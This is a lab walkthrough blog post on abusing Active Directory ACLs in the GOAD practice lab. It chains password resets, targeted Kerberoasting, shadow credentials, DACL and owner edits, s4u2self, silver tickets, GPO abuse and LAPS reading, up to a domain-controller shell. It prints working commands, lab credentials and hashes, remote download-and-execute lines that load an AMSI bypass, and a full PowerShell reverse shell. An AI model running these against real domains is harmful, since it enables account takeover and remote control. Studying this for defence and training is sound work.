GOAD-ACL

GOAD – part 11 – ACL

On the previous post (Goad pwning part10) we did some exploitation by abusing delegation. On this blog post, we will have fun with ACL in the lab.

In active directory, objects right are called Access Control Entries (ACE), a list of ACE is called Access Control List (ACL).

 

  • The new ACL overview in the lab is this one :
MATCH p=(u)-[r1]->(n) WHERE r1.isacl=true and not tolower(u.name) contains 'vagrant' and u.admincount=false and not tolower(u.name) contains 'key' RETURN p

.

sevenkingdoms.local ACL

To start we will focus on the sevenkingdoms killchain of ACL by starting with tywin.lannister (password: powerkingftw135)

  • The path here is :
    • Tywin -> Jaime : Change password user
    • Jaime -> Joffrey : Generic Write user
    • Joffrey -> Tyron : WriteDacl on user
    • Tyron -> small council : add member on group
    • Small council -> dragon stone : write owner group to group
    • dragonstone -> kingsguard : write owner to group
    • kingsguard -> stannis : Generic all on User
    • stannis -> kingslanding : Generic all on Computer

  • Let’s try to do all the path from tywin to kingslanding domain controler 🙂

Reminder : Abusing ACL make change on the targets. Be sure to you know what you are doing if you try to exploit it during an audit.

ForceChangePassword on User (Tywin -> Jaime)

  • This one should never be done in a pentest (unless the customer is ok with that). You don’t want to block a user during your audit.
  • As tywin.lannister we will change jaime.lannister password

net rpc password jaime.lannister -U sevenkingdoms.local/tywin.lannister%powerkingftw135 -S kingslanding.sevenkingdoms.local
  • We set the new jaime password.
  • And verify the password is ok.
from Windows
runas /user:tywin.lannister@sevenkingdoms.local cmd
. .\PowerView.ps1
$UserPassword = ConvertTo-SecureString 'pasdebraspasdechocolat' -AsPlainText -Force
Set-DomainUserPassword -Identity jaime.lannister -AccountPassword $UserPassword -Credential $Cred -Verbose
.
.
nxc smb 192.168.56.10 -u jaime.lannister -d sevenkingdoms.local -p pasdebraspasdechocolat

GenericWrite on User (Jaime -> Joffrey)

  • As we just set up jaime password we will now exploit the GenericWrite from Jaime to Joffrey

  • This could be abuse with 3 different technics :
    • shadowCredentials (windows server 2016 or +)
    • targetKerberoasting (password should be weak enough to be cracked)
    • logonScript (this need a user connection and to be honest it never worked or unless with a script already inside sysvol)

Target Kerberoasting

This abuse can be carried out when controlling an object that has a GenericAllGenericWriteWriteProperty or Validated-SPN over the target.

  • First let’s do a target Kerberoasting, the principe is simple. Add an SPN to the user, ask for a tgs, remove the SPN on the user.
  • And now we can crack the TGS just like a classic kerberoasting.
  • Shutdown have done a tool which do all the work for you : https://github.com/ShutdownRepo/targetedKerberoast
targetedKerberoast.py -v -d sevenkingdoms.local -u jaime.lannister -p pasdebraspasdechocolat --request-user joffrey.baratheon

  • And now just crack the hash
hashcat -m 13100 -a 0 joffrey.hash rockyou.txt --force

.

or use nxc ldap "192.168.56.10" -d "sevenkingdoms.local" -u "jaime.lannister" -p "cersei" --kerberoasting kerberoastables.txt

┌──(bolke㉿kali)-[~/htb]
└─$ nxc ldap "192.168.56.10" -d "sevenkingdoms.local" -u "jaime.lannister" -p "cersei" --kerberoasting kerberoastables.txt
LDAP        192.168.56.10   389    KINGSLANDING     [*] Windows 10 / Server 2019 Build 17763 (name:KINGSLANDING) (domain:sevenkingdoms.local) (signing:None) (channel binding:Never)
LDAP        192.168.56.10   389    KINGSLANDING     [+] sevenkingdoms.local\jaime.lannister:cersei
LDAP        192.168.56.10   389    KINGSLANDING     [*] Skipping disabled account: krbtgt
LDAP        192.168.56.10   389    KINGSLANDING     [*] Total of records returned 1
LDAP        192.168.56.10   389    KINGSLANDING     [*] sAMAccountName: joffrey.baratheon, memberOf: ['CN=Baratheon,OU=Stormlands,DC=sevenkingdoms,DC=local', 'CN=Lannister,OU=Westerlands,DC=sevenkingdoms,DC=local'], pwdLastSet: 2026-04-08 11:27:56.158969, lastLogon: <never>
LDAP        192.168.56.10   389    KINGSLANDING     $krb5tgs$23$*joffrey.baratheon$SEVENKINGDOMS.LOCAL$sevenkingdoms.local\joffrey.baratheon*$ffb9c801e3<snip>080650d1

.

hashcat -m 13100 -a 0 kerberoastables.txt /usr/share/wordlists/rockyou.txt.gz --force

from windows

Enter-PSSession -ComputerName studvm -Credential sevenkingdoms\jaime.lannister

iex ((New-Object Net.WebClient).DownloadString('http://192.168.56.1/PowerView.ps1'))

# Make sur that the target account has no SPN

Get-DomainUser 'joffrey.baratheon' | Select serviceprincipalname

# Set the SPN

Set-DomainObject -Identity 'joffrey.baratheon' -Set @{serviceprincipalname='nonexistent/BLAHBLAH'}

# Obtain a kerberoast hash

$User = Get-DomainUser 'joffrey.baratheon'

$User | Get-DomainSPNTicket | fl

or .\Loader.exe -path C:\ad\TOOLS\Rubeus.exe -args kerberoast /user:joffrey.baratheon /simple /rc4opsec

# Clear the SPNs of the target account

$User | Select serviceprincipalname

Set-DomainObject -Identity victimuser -Clear serviceprincipalname

.

reference : https://www.thehacker.recipes/ad/movement/dacl/targeted-kerberoasting

I used a win2022 studvm$ joined to north.sevenkingdoms.local , and logged on as \sevenkingdoms\joffrey.baratheon , and there from rdp session

#load PowerView.ps1
iex ((New-Object Net.WebClient).DownloadString('http://192.168.56.1/PowerView.ps1'))

# Make sure that the target account has no SPN
Get-DomainUser 'joffrey.baratheon' | Select serviceprincipalname

# Set the SPN
Set-DomainObject -Identity 'joffrey.baratheon' -Set @{serviceprincipalname='nonexistent/BLAHBLAH'}

# Rubeus.exe kerberoast
use PS C:\AD\TOOLS> .\Loader.exe -path C:\ad\TOOLS\Rubeus.exe -args kerberoast /user:joffrey.baratheon /simple /rc4opsec /outfile C:\AD\TOOLS\joffreyhash.txt

# Clear the SPNs of the target account
Set-DomainObject -Identity joffrey.baratheon -Clear serviceprincipalname

an then crack the hash with John

C:\AD\Tools\john-1.9.0-jumbo-1-win64\run\john.exe --wordlist=C:\AD\Tools\kerberoast\rockyou.txt C:\AD\Tools\joffreyhash2.txt

.

PS C:\AD\TOOLS> C:\AD\Tools\john-1.9.0-jumbo-1-win64\run\john.exe --wordlist=C:\AD\Tools\kerberoast\rockyou.txt C:\AD\Tools\joffreyhash2.txt
Using default input encoding: UTF-8
Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
1killerlion      (?)
1g 0:00:00:42 DONE (2026-05-22 04:30) 0.02378g/s 309335p/s 309335c/s 309335C/s 1kingjames..1kek9
Use the "--show" option to display all of the cracked passwords reliably
Session completed

.

Shadow Credentials

This was already done previously in this blog, one of the fastest exploitation is with certipy:

certipy shadow auto -u jaime.lannister@sevenkingdoms.local -p 'pasdebraspasdechocolat' -account 'joffrey.baratheon'

from windows

PS C:\AD\TOOLS> ./certipy.exe shadow auto -u jaime.lannister@sevenkingdoms.local -p 'cersei' -account 'joffrey.baratheon'
Certipy v5.0.4 - by Oliver Lyak (ly4k)

[!] DNS resolution failed: The DNS query name does not exist: SEVENKINGDOMS.LOCAL.
[!] Use -debug to print a stacktrace
[*] Targeting user 'joffrey.baratheon'
[*] Generating certificate
[*] Certificate generated
[*] Generating Key Credential
[*] Key Credential generated with DeviceID '4f74115ab2074440853e84ca7f6cec02'
[*] Adding Key Credential with device ID '4f74115ab2074440853e84ca7f6cec02' to the Key Credentials for 'joffrey.baratheon'
[*] Successfully added Key Credential with device ID '4f74115ab2074440853e84ca7f6cec02' to the Key Credentials for 'joffrey.baratheon'
[*] Authenticating as 'joffrey.baratheon' with the certificate
[*] Certificate identities:
[*]     No identities found in this certificate
[*] Using principal: 'joffrey.baratheon@sevenkingdoms.local'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'joffrey.baratheon.ccache'
[*] Wrote credential cache to 'joffrey.baratheon.ccache'
[*] Trying to retrieve NT hash for 'joffrey.baratheon'
[*] Restoring the old Key Credentials for 'joffrey.baratheon'
[*] Successfully restored the old Key Credentials for 'joffrey.baratheon'
[*] NT hash for 'joffrey.baratheon': 3b60abbc25770511334b3829866b08f1
PS C:\AD\TOOLS>

or ShadowCredentials with Whisker+Rubeus : https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/shadow-credentials

runas /user:jaime.lannister@sevenkingdoms.local cmd

Whisker.exe list /target:joffrey.baratheon

Whisker.exe add /target:joffrey.baratheon

Rubeus.exe asktgt /user:joffrey.baratheon /certificate:MII<snip>RrQ/password:"2AAYSlj7qEV2vZBP" /domain:sevenkingdoms.local /dc:kingslanding.sevenkingdoms.local /getcredentials /show

.

C:\Windows\system32>runas /user:jaime.lannister@sevenkingdoms.local cmd
Enter the password for jaime.lannister@sevenkingdoms.local:
Attempting to start cmd as user jaime.lannister@sevenkingdoms.local ...

C:\Windows\system32>hostname
STUDVM

--and then --

c:\AD\TOOLS>Whisker.exe list /target:joffrey.baratheon
[*] Searching for the target account
[*] Target user found: CN=joffrey.baratheon,OU=Crownlands,DC=sevenkingdoms,DC=local
[*] Listing deviced for joffrey.baratheon:
    DeviceID: 30a31245-7634-a642-97d6-517d1e032cc2 | Creation Time: 6/10/2026 5:36:03 AM

c:\AD\TOOLS>whoami
sevenkingdoms\jaime.lannister

c:\AD\TOOLS>Whisker.exe add /target:joffrey.baratheon
[*] No path was provided. The certificate will be printed as a Base64 blob
[*] No pass was provided. The certificate will be stored with the password 2AAYSlj7qEV2vZBP
[*] Searching for the target account
[*] Target user found: CN=joffrey.baratheon,OU=Crownlands,DC=sevenkingdoms,DC=local
[*] Generating certificate
[*] Certificate generaged
[*] Generating KeyCredential
[*] KeyCredential generated with DeviceID c5aa0ab2-a68c-4cbc-af53-b5fb6427eac7
[*] Updating the msDS-KeyCredentialLink attribute of the target object
[+] Updated the msDS-KeyCredentialLink attribute of the target object
[*] You can now run Rubeus with the following syntax:

Rubeus.exe asktgt /user:joffrey.baratheon /certificate:MIIJyAIB<snip>D5wP1ECAgfQ /password:"2AAYSlj7qEV2vZBP" /domain:sevenkingdoms.local /dc:kingslanding.sevenkingdoms.local /getcredentials /show

c:\AD\TOOLS>
c:\AD\TOOLS>Rubeus.exe asktgt /user:joffrey.baratheon /certificate:MIIJyAIBAzCCCYQGCSqGSIb3DQEHAaCCCXUEgglxMIIJbTCCB<snip>5wP1ECAgfQ /password:"2AAYSlj7qEV2vZBP" /domain:sevenkingdoms.local /dc:kingslanding.sevenkingdoms.local /getcredentials /show

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v2.3.3

[*] Action: Ask TGT

[*] Using PKINIT with etype rc4_hmac and subject: CN=joffrey.baratheon
[*] Building AS-REQ (w/ PKINIT preauth) for: 'sevenkingdoms.local\joffrey.baratheon'
[*] Using domain controller: 192.168.56.10:88
[+] TGT request successful!
[*] base64(ticket.kirbi):

      doIG3jC<snip>5sb2NhbA==

  ServiceName              :  krbtgt/sevenkingdoms.local
  ServiceRealm             :  SEVENKINGDOMS.LOCAL
  UserName                 :  joffrey.baratheon (NT_PRINCIPAL)
  UserRealm                :  SEVENKINGDOMS.LOCAL
  StartTime                :  6/10/2026 6:02:02 AM
  EndTime                  :  6/10/2026 4:02:02 PM
  RenewTill                :  6/17/2026 6:02:02 AM
  Flags                    :  name_canonicalize, pre_authent, initial, renewable, forwardable
  KeyType                  :  rc4_hmac
  Base64(key)              :  9yXTG8pcdREUeoxoJ2GvHA==
  ASREP (key)              :  CDA85F24C1EBC65C53F72C368DF0508B

[*] Getting credentials using U2U

  CredentialInfo         :
    Version              : 0
    EncryptionType       : rc4_hmac
    CredentialData       :
      CredentialCount    : 1
       NTLM              : 3B60ABBC25770511334B3829866B08F1

c:\AD\TOOLS>

 

.

Logon script

  • To show the scriptpath ldap value instead of ldapsearch we can use the tool ldeep
ldeep ldap -u jaime.lannister -p 'pasdebraspasdechocolat' -d sevenkingdoms.local -s ldap://192.168.56.10 search '(sAMAccountName=joffrey.baratheon)' scriptpath

.

<snip>

  • Start responder and simulate joffrey connection by starting an RDP connection
responder -I vboxnet0
xfreerdp /d:sevenkingdoms.local /u:joffrey.baratheon /p:'1killerlion' /v:192.168.56.10 /size:80%  /cert-ignore
  • And we get the NetNLMV2 hash of joffrey.baratheon and… kingslanding$ !

WriteDacl on User (Joffrey -> Tyron)

  • To exploit writeDacl from Joffrey to Tyron we can use dacledit.py
  • First let’s look at joffrey’s right on tyron :
dacledit.py -action 'read' -principal joffrey.baratheon -target 'tyron.lannister' 'sevenkingdoms.local'/'joffrey.baratheon
  • Ok now change the permission to “FullControl” and see the modification
dacledit.py -action 'write' -rights 'FullControl' -principal joffrey.baratheon  -target 'tyron.lannister' 'sevenkingdoms.local'/'joffrey.baratheon':'1killerlion'

or from Windows use PowerView.ps1

runas /user:jaime.lannister@sevenkingdoms.local powershell

Import-Module . .\PowerView.ps1

# Add ACLs for a specific user
Add-DomainObjectAcl -Rights 'All' -TargetIdentity "tyron.lannister" -PrincipalIdentity "joffrey.baratheon"

# Retrieve ACLs for a specific user and resolve GUIDs to display names
Get-DomainObjectAcl -Identity "tyron.lannister" -Domain "sevenkingdoms.local" -ResolveGUIDs

 

  • Ok now we can :
    • change tyron password
    • do a target kerberoasting
    • do a shadow credentials
  • Let’s just use shadowcredentials :
certipy shadow auto -u joffrey.baratheon@sevenkingdoms.local -p '1killerlion' -account 'tyron.lannister'

.

.

Add self on Group (Tyron -> Small Council)

  • We now got tyron so we can add us into the small council group

  • First find the distinguished name
ldeep ldap -u tyron.lannister -H ':b3b3717f7d51b37fb325f7e7d048e998' -d sevenkingdoms.local -s ldap://192.168.56.10 search '(sAMAccountName=tyron.lannister)' distinguishedName
ldeep ldap -u tyron.lannister -H ':b3b3717f7d51b37fb325f7e7d048e998' -d sevenkingdoms.local -s ldap://192.168.56.10 search '(sAMAccountName=Small Council)' distinguishedName

  • Add tyron to Small Council
ldeep ldap -u tyron.lannister -H ':b3b3717f7d51b37fb325f7e7d048e998' -d sevenkingdoms.local -s ldap://192.168.56.10 add_to_group "CN=tyron.lannister,OU=Westerlands,DC=sevenkingdoms,DC=local" "CN=Small Council,OU=Crownlands,DC=sevenkingdoms,DC=local"
  • See the result
  • ldeep ldap -u tyron.lannister -H ':b3b3717f7d51b37fb325f7e7d048e998' -d sevenkingdoms.local -s ldap://192.168.56.10 membersof 'Small Council'
    

    .

.all in 1 row from linux

┌──(bolke㉿kali)-[~/htb]
└─$ impacket-dacledit -action 'read' -principal joffrey.baratheon -target 'tyron.lannister' 'sevenkingdoms.local'/'joffrey.baratheon':'1killerlion'
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies

[*] Parsing DACL
[*] Printing parsed DACL
[*] Filtering results for SID (S-1-5-21-3008081783-3975149589-1763115855-1118)
[*]   ACE[19] info
[*]     ACE Type                  : ACCESS_ALLOWED_ACE
[*]     ACE flags                 : None
[*]     Access mask               : WriteDACL (0x40000)
[*]     Trustee (SID)             : joffrey.baratheon (S-1-5-21-3008081783-3975149589-1763115855-1118)

┌──(bolke㉿kali)-[~/htb]
└─$ impacket-dacledit -action 'write' -rights 'FullControl' -principal joffrey.baratheon -target 'tyron.lannister' 'sevenkingdoms.local'/'joffrey.baratheon':'1killerlion'
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies

[*] DACL backed up to dacledit-20260522-144220.bak
[*] DACL modified successfully!

┌──(bolke㉿kali)-[~/htb]
└─$ certipy shadow auto -u joffrey.baratheon@sevenkingdoms.local -p '1killerlion' -account 'tyron.lannister'
Certipy v5.0.4 - by Oliver Lyak (ly4k)

[!] DNS resolution failed: All nameservers failed to answer the query SEVENKINGDOMS.LOCAL. IN A: Server Do53:1.1.1.2@53 answered [Errno 101] Network is unreachable
[!] Use -debug to print a stacktrace
[*] Targeting user 'tyron.lannister'
[*] Generating certificate
[*] Certificate generated
[*] Generating Key Credential
[*] Key Credential generated with DeviceID '58356f0ca2c44b46bb582b770ade37b5'
[*] Adding Key Credential with device ID '58356f0ca2c44b46bb582b770ade37b5' to the Key Credentials for 'tyron.lannister'
[*] Successfully added Key Credential with device ID '58356f0ca2c44b46bb582b770ade37b5' to the Key Credentials for 'tyron.lannister'
[*] Authenticating as 'tyron.lannister' with the certificate
[*] Certificate identities:
[*]     No identities found in this certificate
[*] Using principal: 'tyron.lannister@sevenkingdoms.local'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'tyron.lannister.ccache'
[*] Wrote credential cache to 'tyron.lannister.ccache'
[*] Trying to retrieve NT hash for 'tyron.lannister'
[*] Restoring the old Key Credentials for 'tyron.lannister'
[*] Successfully restored the old Key Credentials for 'tyron.lannister'
[*] NT hash for 'tyron.lannister': b3b3717f7d51b37fb325f7e7d048e998

┌──(bolke㉿kali)-[~/htb]
└─$ ldeep ldap -u tyron.lannister -H ':b3b3717f7d51b37fb325f7e7d048e998' -d sevenkingdoms.local -s ldap://192.168.56.10 search '(sAMAccountName=tyron.lannister)' distinguishedName
[{
  "distinguishedName": "CN=tyron.lannister,OU=Westerlands,DC=sevenkingdoms,DC=local",
  "dn": "CN=tyron.lannister,OU=Westerlands,DC=sevenkingdoms,DC=local"
}]

┌──(bolke㉿kali)-[~/htb]
└─$ ldeep ldap -u tyron.lannister -H ':b3b3717f7d51b37fb325f7e7d048e998' -d sevenkingdoms.local -s ldap://192.168.56.10 search '(sAMAccountName=Small Council)' distinguishedName
[{
  "distinguishedName": "CN=Small Council,OU=Crownlands,DC=sevenkingdoms,DC=local",
  "dn": "CN=Small Council,OU=Crownlands,DC=sevenkingdoms,DC=local"
}]

┌──(bolke㉿kali)-[~/htb]
└─$ ldeep ldap -u tyron.lannister -H ':b3b3717f7d51b37fb325f7e7d048e998' -d sevenkingdoms.local -s ldap://192.168.56.10 add_to_group "CN=tyron.lannister,OU=Westerlands,DC=sevenkingdoms,DC=local" "CN=Small Council,OU=Crownlands,DC=sevenkingdoms,DC=local"
[+] User CN=tyron.lannister,OU=Westerlands,DC=sevenkingdoms,DC=local successfully added to CN=Small Council,OU=Crownlands,DC=sevenkingdoms,DC=local

┌──(bolke㉿kali)-[~/htb]
└─$ ldeep ldap -u tyron.lannister -H ':b3b3717f7d51b37fb325f7e7d048e998' -d sevenkingdoms.local -s ldap://192.168.56.10 membersof 'Small Council'
maester.pycelle (user)
lord.varys (user)
petyer.baelish (user)
stannis.baratheon (user)
renly.baratheon (user)
robert.baratheon (user)
tyron.lannister (user)
cersei.lannister (user)

 

.

from windows

Enter-PSSession -ComputerName kingslanding -Credential sevenkingdoms.local\tyron.lannister

iex (iwr http://192.168.56.1/amsibypass2026.txt -UseBasicParsing)

iex ((New-Object Net.WebClient).DownloadString('http://192.168.56.1/PowerView.ps1'))

Add-DomainGroupMember -Identity 'Small Council' -Members tyron.lannister

Get-DomainGroupMember -Identity 'Small Council' | Select MemberDistinguishedName

net group 'small council' 

.

rubeus.exe asktgt /user:sevenkingdoms\tyron.lannister /rc4:b3b3717f7d51b37fb325f7e7d048e998 C:\windows\system32\cmd.exe /show /ptt

 

.

AddMember on Group (Small Council -> dragonstone)

  • Now as tyron we are in the small council, so we can add a member to dragonstone’s group.
  • So we just add tyron just like we did before

ldeep ldap -u tyron.lannister -H ':b3b3717f7d51b37fb325f7e7d048e998' -d sevenkingdoms.local -s ldap://192.168.56.10 add_to_group "CN=tyron.lannister,OU=Westerlands,DC=sevenkingdoms,DC=local" "CN=DragonStone,OU=Crownlands,DC=sevenkingdoms,DC=local"

.

from windows

Enter-PSSession -ComputerName kingslanding -Credential sevenkingdoms.local\tyron.lannister

iex ((New-Object Net.WebClient).DownloadString('http://192.168.56.1/PowerView.ps1')))

Add-DomainGroupMember -Identity 'Dragonstone' -Members 'tyron.lannister')

net group 'dragonstone'

WriteOwner on Group (dragonstone -> kingsguard)

  • Now with the writeOwner privilege we can change the owner of kingsguard to own the group

  • Just like before we will use the impacket fork
owneredit.py -action read -target 'kingsguard' -hashes ':b3b3717f7d51b37fb325f7e7d048e998' sevenkingdoms.local/tyron.lannister

owneredit.py -action write new-owner 'tyron.lannister' -target 'kingsguard' -hashes ':b3b3717f7d51b37fb325f7e7d048e998' sevenkingdoms.local/tyron.lannister

.

  • And the owner of kingsguard group is now tyron.lannister
  • As owner of the group we can now change the acl and give us GenericAll on the group
dacledit.py -action 'write' -rights 'FullControl' -principal tyron.lannister -target 'kingsguard' 'sevenkingdoms.local'/'tyron.lannister' -hashes ':b3b3717f7d51b37fb325f7e7d048e998'
  • With GenericAll now we can add tyron to the kingsguard group
ldeep ldap -u tyron.lannister -H ':b3b3717f7d51b37fb325f7e7d048e998' -d sevenkingdoms.local -s ldap://192.168.56.10 add_to_group "CN=tyron.lannister,OU=Westerlands,DC=sevenkingdoms,DC=local" "CN=kingsguard,OU=Crownlands,DC=sevenkingdoms,DC=local"

.

from windows

Enter-PSSession -ComputerName kingslanding -Credential sevenkingdoms.local\tyron.lannister

iex (iwr http://192.168.56.1/amsibypass2026.txt -UseBasicParsing)

iex ((New-Object Net.WebClient).DownloadString('http://192.168.56.1/PowerView.ps1'))

Add-DomainObjectAcl -Rights 'All' -TargetIdentity "kingsguard" -PrincipalIdentity "tyron.lannister"

Set-DomainObjectOwner -Identity 'KingsGuard' -OwnerIdentity tyron.lannister

Add-DomainGroupMember -Identity 'KingsGuard' -Members 'tyron.lannister'

net group 'KingsGuard' 

Generic all on user (kingsguard -> stannis)

  • Now tyron is in kingsguard so we can take the control of stannis with the genericAll on stannis

  • let’s change stannis password with ldeep
net rpc password stannis.baratheon --pw-nt-hash -U sevenkingdoms.local/tyron.lannister%b3b3717f7d51b37fb325f7e7d048e998 -S kingslanding.sevenkingdoms.local
  • We will set the password Drag0nst0ne (i know it is the same as before but i didn’t want to change  screenshots in the next part  )

verify : nxc smb sevenkingdoms.local -u stannis.baratheon -p Drag0nst0ne2

 

from windows

simply with: net user /domain stannis.baratheon Drag0nst0ne3  or

Enter-PSSession -ComputerName kingslanding -Credential sevenkingdoms.local\tyron.lannister

iex (iwr http://192.168.56.1/amsibypass2026.txt -UseBasicParsing)

iex ((New-Object Net.WebClient).DownloadString('http://192.168.56.1/PowerView.ps1'))

$userpassword = ConvertTo-SecureString 'Drag0nst0ne2' -AsPlainText -Force

Add-DomainGroupMember -Identity 'KingsGuard' -Members 'tyron.lannister'

Set-DomainUserPassword -Identity stannis.baratheon -AccountPassword $userpassword

 

how2use Set-DomainUserPassword

$SecPassword = ConvertTo-SecureString 'Needle' -AsPlainText -Force

$Cred = New-Object System.Management.Automation.PSCredential('NORTH\arya.stark', $SecPassword)

$UserPassword = ConvertTo-SecureString 'Password@7' -AsPlainText -Force

Set-DomainUserPassword -Identity puretech -AccountPassword $UserPassword -Credential $Cred -Verbose

.

GenericAll on Computer (Stannis -> kingslanding)

  • Now we own stannis, let’s finish the domain with the generic Write on the DC

  • We already done that on the previous chapter. One way to abuse of this permission is by using Resource Based Constrained Delegation (Goad pwning part10)
  • But what if you can’t add a computer in the domain (more and more customers disable the ability for a simple user to add computer to the domains and this is a good practice from a security point of view), you can do a shadow credentials attack on the computer.
  • So if ADCS is enabled on the domain, and we got write privilege on msDS-KeyCredentialLink, we can do the shadow credentials attack to get a direct access on the target account. (just like what we did in Goad pwning part5)
  • Shadow credentials is now include with certipy (this attack can also be done with pywisker )
certipy shadow auto -u stannis.baratheon@sevenkingdoms.local -p 'Drag0nst0ne' -account 'kingslanding$'

  • Now we got the tgt and the NT hash of kingslanding$
  • Obviously we can do a dcsync because kingslanding is a DC, but instead let’s try to directly get a shell
  • To do that the easiest way is using s4u2self abuse or create a silver ticket

machine account to administrator shell

s4u2self abuse

  • s4u2self abuse : we ask for a TGS as the Administrator domain user

.

impacket-getTGT -hashes ':4fe6145b606158428563e7ae5db9f891' sevenkingdoms.local/kingslanding$

export KRB5CCNAME=kingslanding.ccache

impacket-getST -self -impersonate "Administrator" -altservice "cifs/kingslanding.sevenkingdoms.local" -k -no-pass -dc-ip 192.168.56.10 "sevenkingdoms.local"/'kingslanding$' 

.

impacket-getTGT -hashes ':4fe6145b606158428563e7ae5db9f891' sevenkingdoms.local/kingslanding$          
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] Saving ticket in kingslanding$.ccache
                                                                                                                                                                                           
export KRB5CCNAME=kingslanding.ccache                                                           
                                                                                                                                                                                           
klist
Ticket cache: FILE:kingslanding.ccache
Default principal: kingslanding$@SEVENKINGDOMS.LOCAL

Valid starting       Expires              Service principal
06/25/2026 10:41:41  06/25/2026 20:41:41  krbtgt/SEVENKINGDOMS.LOCAL@SEVENKINGDOMS.LOCAL
    renew until 06/26/2026 10:41:40
                                                                                                                                                                                           
impacket-getST -self -impersonate "Administrator" -altservice "cifs/kingslanding.sevenkingdoms.local" -k -no-pass -dc-ip 192.168.56.10 "sevenkingdoms.local"/'kingslanding$' 
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] Impersonating Administrator
[*] Requesting S4U2self
[*] Changing service from kingslanding$@SEVENKINGDOMS.LOCAL to cifs/kingslanding.sevenkingdoms.local@SEVENKINGDOMS.LOCAL
[*] Saving ticket in Administrator@cifs_kingslanding.sevenkingdoms.local@SEVENKINGDOMS.LOCAL.ccache
                                                                                                                                                                                       
                                                                                                                                                                                           

.

  • And than we use that ticket to connect as administrator
export KRB5CCNAME=Administrator@cifs_kingslanding.sevenkingdoms.local@SEVENKINGDOMS.LOCAL.ccache                            
                                                                                                                                                                                           
klist
Ticket cache: FILE:Administrator@cifs_kingslanding.sevenkingdoms.local@SEVENKINGDOMS.LOCAL.ccache
Default principal: Administrator@sevenkingdoms.local

Valid starting       Expires              Service principal
06/25/2026 10:59:25  06/25/2026 20:41:41  cifs/kingslanding.sevenkingdoms.local@SEVENKINGDOMS.LOCAL
    renew until 06/26/2026 10:41:40
                                                                                                                                                                                           
impacket-wmiexec -k -no-pass sevenkingdoms.local/administrator@kingslanding.sevenkingdoms.local
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>hostname
kingslanding

.

or use also working : impacket-psexec -k -no-pass sevenkingdoms.local/administrator@kingslanding.sevenkingdoms.local

.

Silver ticket

  • Another way to get a shell is by creating a silver ticket :
  • Find the domain SID:
lookupsid.py -hashes ':33a43e326dad53a516dc06393281d2cc' 'sevenkingdoms.local'/'kingslanding$'@kingslanding.sevenkingdoms.local 0

  • Create the silver ticket:
ticketer.py -nthash '33a43e326dad53a516dc06393281d2cc' -domain-sid 'S-1-5-21-1409754491-4246775990-3914137275' -domain sevenkingdoms.local -spn cifs/kingslanding.sevenkingdoms.local Administrator
  • And use it :
export KRB5CCNAME=/workspace/acl/Administrator.ccache
wmiexec.py -k -no-pass sevenkingdoms.local/administrator@kingslanding.sevenkingdoms.local

Ok the fun with sevenkingdoms.local domain is over, now let’s try some acl in the other domains.

GPO abuse

  • There is a GPO abuse on the north domain

  • To abuse GPO we will use the project created by Hackndo : pyGPOAbuse
  • The github readme file say : “It will create an immediate scheduled task as SYSTEM on the remote computer for computer GPO, or as logged in user for user GPO.”
git clone https://github.com/Hackndo/pyGPOAbuse.git
python3 -m virtualenv .venv
source .venv/bin/activate
python3 -m pip install -r requirements.txt
  • We get the id from bloodhound and launch the exploit with :
python3 pygpoabuse.py north.sevenkingdoms.local/samwell.tarly:'Heartsbane' -gpo-id "6F8BD644-2C29-418C-93F1-FE926F91F6B4"

 

  • If we take a look in the windows GUI we will see the schedule task created :

  • If we wait few minutes or if we run a gpudate /force we will see the new local admin user

  • Now let’s try to get a powershell reverseshell
python3 pygpoabuse.py north.sevenkingdoms.local/samwell.tarly:'Heartsbane' -gpo-id "6F8BD644-2C29-418C-93F1-FE926F91F6B4" -powershell -command "\$c = New-Object System.Net.Sockets.TCPClient('192.168.56.1',4444);\$s = \$c.GetStream();[byte[]]\$b = 0..65535|%{0};while((\$i = \$s.Read(\$b, 0, \$b.Length)) -ne 0){ \$d = (New-Object -TypeName System.Text.ASCIIEncoding).GetString(\$b,0, \$i); \$sb = (iex \$d 2>&1 | Out-String ); \$sb = ([text.encoding]::ASCII).GetBytes(\$sb + 'ps> '); \$s.Write(\$sb,0,\$sb.Length); \$s.Flush()};\$c.Close()" -taskname "MyTask" -description "don't worry"

.

  • And a few moments later we get the powershell reverseshell

 

pyGPOAbuse is changing the GPO without going back ! Do not use in production or at your own risk and do not forget to cleanup after

  • Cleanup

 

Read Laps password

acl_read_laps.png

  • To read LAPS password, the easy way is with the cme module
cme ldap 192.168.56.12 -d essos.local -u jorah.mormont -p 'H0nnor!' --module laps

  • Works like a charm 🙂

Resources:

Next time, this will be the last blog post of the GOAD writeup series. And it will be on Trusts exploitation (Goad pwning part12)